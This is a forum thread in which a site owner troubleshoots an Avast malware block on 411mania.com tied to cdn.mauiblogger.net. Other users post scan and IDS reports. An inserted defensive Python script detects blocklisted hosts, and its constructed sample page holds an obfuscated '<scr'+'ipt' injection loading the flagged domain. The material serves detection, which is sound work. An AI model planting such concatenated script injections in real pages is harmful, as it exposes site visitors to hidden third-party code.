Site flagged for malware (mauiblogger.net), help needed

A few users of my site (411mania.com) who use Avast have told me that they get a warning when trying to access the site. The warning message that comes up for a user of mine is:

“MALICIOUS URL BLOCKED”
avast! Network Shield has blocked a harmful site
Object: http.//cdn.mauiblogger.net/k
Infection: URL:Mal
Target Process: Firefox

As far as I know, no other blocker, nor Google, has marked the site for malware. Google is usually all over me anytime a malware issue comes up, and I have not heard anything from them about this (and this issue has been going on for days on Avast, so it’s not a new issue).

Any help on how I can fix this issue on avast would be appreciated. I feel like it’s a false positive because I cannot find anything about the mauiblogger.net domain, nobody else is marking the site as suspicious, and I can’t find anything unusual in my code. It might be something come through via the ads, but I use only well established ad companies like AdSense, Tribal Fusion, etc.

If anyone has any input on this, I’d appreciate it.

Thanks!

Also just to add a bit more info:

I downloaded Avast for Mac and do not get any warning when accessing the 411mania.com site. So it appears only PC users using Avast get the warning. I also removed all the ads from a test page and had one of the users who is getting the warning access it, and he still got the warning.

Any input would be appreciated. Thanks!

URL:Mal does not mean the site is infected; it means the URL is on a blacklist,

and this can be the reason why (411mania.com): http://urlquery.net/report.php?id=4423784

Intrusion Detection Systems.
Suricata /w Emerging Threats Pro
2013-08-07 08:09:39 212.124.126.7 urlQuery Client 3 ET RBN Known Russian Business Network IP (162)

Wikipedia. Russian Business Network http://en.wikipedia.org/wiki/Russian_Business_Network

If you think this is wrong, report it here: http://www.avast.com/contact-form.php
you may add a link to this topic in case they reply

Thanks for the reply Pondus. Any idea how I can solve the issue? All my ad companies are claiming that none of their advertisers have anything to do with that domain, and I can’t find anything else in my code that would cause something from that domain to load on my site. It’s really puzzling to me and I’m running out of ideas on how to solve the problem for Avast users.

Well, here: http://zulu.zscaler.com/submission/show/8c76b8eb17ddc36eeadee40e24fb67df-1375991351

Zulu is not completing the scan for the 411 site, but downforeveryoneorjustme is reporting the site as live.

See attached:

I’d check for nested redirects within your site as this block occurred two seconds after loading the webpage when visiting by using scanned links from zulu.

I get either the server did not accept my request, or an invalid URL was passed. The error code returned was:

Code: -2147012894
Description: The operation timed out
Server Response:
Description: unknown response code
Issue with malicious software includes 12 scripting exploit(s).
Recently MALWARE-OTHER TDS Sutra - redirect received IDS alert.
Malicious software is hosted on 1 domain(s), including luminate.com/.

This site was hosted on 1 network(s) including AS27357 (RACKSPACE).
Webrep OK: http://www.webutation.net/go/review/411mania.com
Clean here: http://sitecheck.sucuri.net/scanner/?scan=http%3A%2F%2F411mania.com#tab1

Quttera detects potential suspicious file:
tags.expo9.exponential.com/tags/411maniacom/ROS/tags.js
Severity: Potentially Suspicious
Reason: Suspicious JavaScript code injection.
Details: Procedure: + has been called with a string containing hidden JavaScript code.

polonus

Going there with NoScript and RequestPolicy active in the browser, I now no longer get an avast shield alert.

polonus

Thanks again for your help. The code they are labeling as suspicious is the Tribal Fusion ad code. Tribal Fusion is one of the largest and most reputable ad companies in the country and I’ve been using them for 10+ years with no issues. Really strange. So you guys think the source of the issue is the ad code identified here?:

Quttera detects potential suspicious file:
tags.expo9.exponential.com/tags/411maniacom/ROS/tags.js
Severity: Potentially Suspicious
Reason: Suspicious JavaScript code injection.
Details: Procedure: + has been called with a string containing hidden JavaScript code.

That code is just their standard ad code.

I went into the Tribal Fusion ad system and blocked all ads from mauiblogger.net and mauiblogger.com. Do you guys still get a warning when visiting 411mania.com?

The issue is really weird because Norton and Google have no issues at all with that ad code or anything else on 411mania.com. As far as I know, only users using the PC version of Avast have the issue (Avast on Mac doesn’t give me any warnings).

Block still active when visiting 411. Exact same message as before, indicating source is mauiblogger.net/k

[EDIT:] Just because you’ve no problems with Tribal Fusion in the past does not mean that network cannot be hacked/infected in the future.

Thanks mchain. As a test, I’ve removed the Tribal Fusion (expo9) tags entirely from one page. Can you let me know if you still get a warning when visiting this page:

http://www.411mania.com/games

That will at least tell me if those tags are in fact the issue or if it is something else.

Thanks,
Ashish

I am getting no Alert from Avast. ;D

Thanks Steven. Do you still get the alert on 411mania.com? If you get it on 411mania.com but don’t get it on 411mania.com/games, that would confirm the issue is with the ads.

Thanks,
Ashish

No alert on both sites. ;D

My users who use Avast continue to say that they get the warning. I tested pulling all the ads from the site and still got this issue from urlquery.net:

Intrusion Detection Systems
Suricata /w Emerging Threats Pro No alerts detected
Snort /w Sourcefire VRT
Timestamp Source IP Destination IP Severity Alert
2013-08-09 08:05:02 174.122.149.143 urlQuery Client 1 MALWARE-OTHER TDS Sutra - redirect received

http://urlquery.net/report.php?id=4458074

I’ve since put the ads back up since they aren’t the cause. One ad was causing the earlier warning involving the Russian Business Network IP but I removed that.

I’m at a real loss here. I tried contacting Avast directly but nobody replied.

Do you recognize the sites found here?: http://urlquery.net/domain_graph.php?id=4458074

~!Donovan

Yeah, most of those are ads, which I tried removing entirely but still got the error. You’ll notice in that chart that cdn.mauiblogger.net, which is what is setting off the issue, loads directly from 411mania.com, not one of the other URLs. I had Rackspace look into the issue and they couldn’t even find anything and said that it must be an issue with Avast since no other antivirus software or Google has any issues with anything on the site. I’m really confused/frustrated here.

What is this?

GET /k HTTP/1.1 
Host: cdn.mauiblogger.net

~!Donovan
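The two things the thread keeps circling back to are (a) which resource on the page actually issues the `GET /k` to cdn.mauiblogger.net, when the host does not appear anywhere in the site's own markup, and (b) whether an ad iframe that looks clean reaches it through nested redirects, as suggested earlier. The script below is an added example written for this edit, not code from the thread, from 411mania.com or from any of the scanners mentioned. It parses a page's HTML offline, lists every third-party host that a tag fetches directly, then joins string fragments in inline JavaScript (`'<scr' + 'ipt'`, the "hidden JavaScript code" pattern Quttera reports) to reveal script tags a plain tag inventory never sees, and finally walks a redirect chain. The sample page, the `.test` ad hosts and the redirect table are all constructed for the example; only the blocklisted host `mauiblogger.net` and the path `/k` come from the thread's alert.

```python
"""Inventory third-party loads on a page, reveal script tags hidden by string
concatenation, and walk a redirect chain to a blocklisted host.

Added example; everything except the blocked host (cdn.mauiblogger.net/k) is
constructed for illustration."""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Tag attributes that make the browser fetch a resource.
FETCH_ATTRS = {"script": "src", "iframe": "src", "img": "src",
               "link": "href", "embed": "src", "object": "data"}

# Host (and subdomains) that Avast flagged in the thread.
BLOCKLIST = {"mauiblogger.net"}


class ResourceCollector(HTMLParser):
    """Collect fetched URLs and the bodies of inline <script> blocks."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.resources = []       # (tag, absolute URL)
        self.inline_scripts = []  # text of each <script> without src
        self._buf = None          # open inline-script buffer, if any

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        attr = FETCH_ATTRS.get(tag)
        if attr and attrs.get(attr):
            self.resources.append((tag, urljoin(self.page_url, attrs[attr])))
        if tag == "script" and not attrs.get("src"):
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.inline_scripts.append("".join(self._buf))
            self._buf = None


def collect(html, page_url):
    parser = ResourceCollector(page_url)
    parser.feed(html)
    parser.close()
    return parser.resources, parser.inline_scripts


def on_blocklist(host, blocklist=BLOCKLIST):
    host = (host or "").lower()
    return any(host == b or host.endswith("." + b) for b in blocklist)


def third_party_hosts(resources, page_url):
    """Map every host other than the page's own to the URLs loaded from it."""
    own = urlsplit(page_url).hostname
    hosts = {}
    for _tag, url in resources:
        host = urlsplit(url).hostname
        if host and host != own:
            hosts.setdefault(host, []).append(url)
    return hosts


_CONCAT = re.compile(r"""["']\s*\+\s*["']""")   # '...' + '...' seams
_URL = re.compile(r"""https?://[^\s"'<>]+""")


def hidden_script_urls(js):
    """URLs inside <script> tags that only exist after joining concatenated
    string literals; a tag written plainly is not reported as hidden."""
    if re.search(r"<script", js, re.I):
        return []
    joined = _CONCAT.sub("", js)
    if not re.search(r"<script", joined, re.I):
        return []
    return _URL.findall(joined)


def audit(html, page_url, blocklist=BLOCKLIST):
    """Return (static, hidden): blocklisted hosts referenced directly by a tag,
    and those revealed only by de-concatenating inline JavaScript."""
    resources, scripts = collect(html, page_url)
    static = sorted(h for h in third_party_hosts(resources, page_url)
                    if on_blocklist(h, blocklist))
    hidden = sorted({urlsplit(u).hostname for s in scripts
                     for u in hidden_script_urls(s)
                     if on_blocklist(urlsplit(u).hostname, blocklist)})
    return static, hidden


def resolve_chain(start_url, redirect_table, max_hops=10):
    """Follow redirects recorded as {url: Location or None}; a live version
    would issue the requests, the table lets the example run offline."""
    chain, url = [start_url], start_url
    for _ in range(max_hops):
        location = redirect_table.get(url)
        if location is None:
            break
        url = urljoin(url, location)
        chain.append(url)
        if chain.count(url) > 1:   # loop guard
            break
    return chain


# Constructed sample page: one ad tag, one ad iframe, and an inline script
# that assembles a <script> tag for the blocked host out of fragments.
PAGE_URL = "http://www.example-news.test/"
SAMPLE_HTML = """<html><head>
<link rel="stylesheet" href="/css/site.css">
<script src="http://tags.example-adnet.test/tags/site/ROS/tags.js"></script>
</head><body>
<img src="/img/logo.png">
<iframe src="http://ads.example-adnet.test/frame?zone=1"></iframe>
<script>
var s = '<scr' + 'ipt src="http://cdn.mauiblogger.net/k"></scr' + 'ipt>';
document.write(s);
</script>
</body></html>"""

# Constructed redirect table: the clean-looking iframe lands on the blocked host
# two hops later.
REDIRECTS = {
    "http://ads.example-adnet.test/frame?zone=1": "http://rtb.example-adnet.test/serve",
    "http://rtb.example-adnet.test/serve": "http://cdn.mauiblogger.net/k",
    "http://cdn.mauiblogger.net/k": None,
}

if __name__ == "__main__":
    res, _ = collect(SAMPLE_HTML, PAGE_URL)
    print("third-party hosts:", sorted(third_party_hosts(res, PAGE_URL)))
    print("blocklisted (static, hidden):", audit(SAMPLE_HTML, PAGE_URL))
    print("iframe chain:", resolve_chain("http://ads.example-adnet.test/frame?zone=1", REDIRECTS))
```

On the constructed page the direct inventory lists only the two ad hosts, the blocked host shows up solely via the de-concatenated inline script, and the iframe reaches it through two redirect hops; against a real page you would feed the fetched HTML of each URL that the direct inventory lists (ad tags load further tags), and replace the redirect table with actual HEAD/GET requests, which is the only way to see a redirect that a scanner's static view of the page misses.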

Look for the alerts on that same IP and domain: http://urlquery.net/report.php?id=3804284
IDS for MALWARE-OTHER TDS Sutra - redirect received, ergo click fraud

polonus

polonus, I clicked on the urlquery report you pulled for cdn.mauiblogger.net and it was totally clean with no malware warning. Makes zero sense that urlquery.com gives a malware warning for 411mania.com which they say is coming from 174.122.149.143 (cdn.mauiblogger.net) but that when I do a urlquery report for cdn.mauiblogger.net itself, it comes back totally clean.

Something isn’t right here.